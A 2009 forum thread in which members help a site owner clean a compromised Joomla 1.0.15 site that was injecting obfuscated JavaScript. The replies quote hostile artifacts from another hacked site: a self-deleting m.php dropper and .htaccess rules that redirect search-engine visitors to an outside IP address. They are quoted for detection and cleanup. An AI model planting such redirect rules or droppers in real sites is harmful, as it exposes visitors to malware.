Urgent PHP/Joomla help please!

Forums › IT Pro and developers › Urgent PHP/Joomla help please!

dpw

843 posts

Ultimate Geek

ID Verified

Trusted

#30877 24-Feb-2009 14:59

Hi folks,

Please excuse me if this message sounds curt in any way. I am getting horribly frustrated with PHP and Joomla - most probably due to my lack of knowledge in the subject matters. It's doing my head in!

It seems one of the site I created a few years ago has been compromised. There is now an obfuscated javascript snippet at the bottom of each page. I have no idea where this snippet is coming from but some AV software report it as Trojan. I'm guessing this links to some malware site somewhere.

The website in question - www.bernesemountaindog.co.nz - has just been upgraded with a full set of 1.0.15 files. I exported the DB through PhpMyAdmin and a scan through the generated SQL revealed no similar content in the DB. I had a look at the template's index.php and nothing there either. I don't know Joomla or PHP enough to look further unfortunately.

I am posting it in this forum for lack of a more appropriate sounding one. Please folks - I'm sure there're some PHP or Joomla gurus out there. Any assistance would be greatly appreciated!

Cheers,
Dany.

Android user, software developer, a semi-typical (not a gamer) geek, and a Bernese Mountain Dog nut!

http://savitarbernese.com | https://nz.linkedin.com/in/danywu

casper021

96 posts

Master Geek

#197762 24-Feb-2009 15:41

You have a problem, your website has been injected with yahoo counter script

look for the following line in your pages, which is begining of the script

script language=javascript><!-- Yahoo! Counter startsAlso I would recomend taking website down as it will infect your website wisitors.

there are a number of ways to fix it you can google "script language=javascript><!-- Yahoo! Counter starts"

What I would recomend is the following

1) Take the website down. (you can set it to offline in joomla)
2) copy all the files to your pc at home
3) run a search on all files for the script ( i think it mainly infects index.* and home.* and default.* files but i may be wrong on this one)
4) remove all the script injections from all the files(note wich files you have modified file names)
5)reupload the files back to the server
6)change the permission on files you modified above to 644

I hope this will help also if the files are executable like script files you may need to set them to 744

dpw

843 posts

Ultimate Geek

ID Verified

Trusted

#197764 24-Feb-2009 15:53

This is what's bugging me - I've searched with a couple of tools but nothing returned. I have taken the site down for now and yes, I already downloaded a copy of the site and its DB.

I'm about to do another search through the files. Just to confirm, this command, executed from the root of the site's folder:

grep -R "Yahoo! Counter" *

should look for what I want, right?

D.

Android user, software developer, a semi-typical (not a gamer) geek, and a Bernese Mountain Dog nut!

http://savitarbernese.com | https://nz.linkedin.com/in/danywu

casper021

96 posts

Master Geek

#197773 24-Feb-2009 16:44

Yep if you running linux grep -R "Yahoo! Counter" * should do the job or even
grep -R "Yahoo" ./*

well earlyer I had a look at the source of your main page just by going view soece from firefox and i could see the script at the bottom.

who is your webhost?

also the other option is to do a diff between your files and a clean joomla download

also have a look at your webhosting folder for the following files

m.php

rename("ht",".htaccess");
unlink("m.php");
echo "OK";

and ht

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://87.248.180.89/topic.html?s=s [R,L]

I think they might also have something to do with it

if you find them just rename them and see if it will fix your problem

dpw

843 posts

Ultimate Geek

ID Verified

Trusted

#197820 24-Feb-2009 19:42

Thanks, I can't find the file m.php anywhere, and I'm not using .htaccess in my folders - everything is probably inherited from the parent directory. Are you suggesting I should create one with that content?

My webhost is kiwihosting.net

Android user, software developer, a semi-typical (not a gamer) geek, and a Bernese Mountain Dog nut!

http://savitarbernese.com | https://nz.linkedin.com/in/danywu

casper021

96 posts

Master Geek

#197874 24-Feb-2009 22:54

no no no no do not create one as this is an example of a hacked one coz one of my joomla websites has been injected with javascript and that was one of the things i found during my investigation

gabba

85 posts

Master Geek

Trusted

#198086 25-Feb-2009 20:54

Hi

Can't be much help sorry, but if you have not already, then the Joomla security thread is a good read(for 1.0.15):

http://forum.joomla.org/viewforum.php?f=267

esp. the security checklist

...but in the spirit of TRYING to help, you might find some more info here(or try a search in the Joomla forums - there appears to be a bit there):

http://forum.joomla.org/viewtopic.php?p=1581519

Thanks for the headsup tho' I'm off to check my joomla sites.

Cheers

casper021

96 posts

Master Geek

#198212 26-Feb-2009 13:11

Here is the final solution which seems to fix this issue

1) Download your website to your computer
2) restore .htaccess file to the original one from the original install of if you not using it just delete it or delete everything from it.
3) Do a search througth your website files for the following code if(!function_exists(’tmp_lkojfghx’))…”).
The good program to do it is wingrep. This code can be in any file or can be as a separate file in in the website this post refering to to it was found in submenu-on1.gif file, this file was containg only one function.
4) remove that function from your code or remove the file if it is in a separate file.
5) reupload your new htaccess file and any other files you have modified.

that should fix it

good luck

Sharesies

Trade NZ and US shares and funds with Sharesies (affiliate link).

dpw

843 posts

Ultimate Geek

ID Verified

Trusted

#198215 26-Feb-2009 13:27

casper021:
Here is the final solution which seems to fix this issue

1) Download your website to your computer
2) restore .htaccess file to the original one from the original install of if you not using it just delete it or delete everything from it.
3) Do a search througth your website files for the following code if(!function_exists(’tmp_lkojfghx’))…”).
The good program to do it is wingrep. This code can be in any file or can be as a separate file in in the website this post refering to to it was found in submenu-on1.gif file, this file was containg only one function.
4) remove that function from your code or remove the file if it is in a separate file.
5) reupload your new htaccess file and any other files you have modified.

Thanks Casper - that has fixed it for now. I'll be interested in hearing how the code in a gif-prefixed file gets executed though!

D.

Android user, software developer, a semi-typical (not a gamer) geek, and a Bernese Mountain Dog nut!

http://savitarbernese.com | https://nz.linkedin.com/in/danywu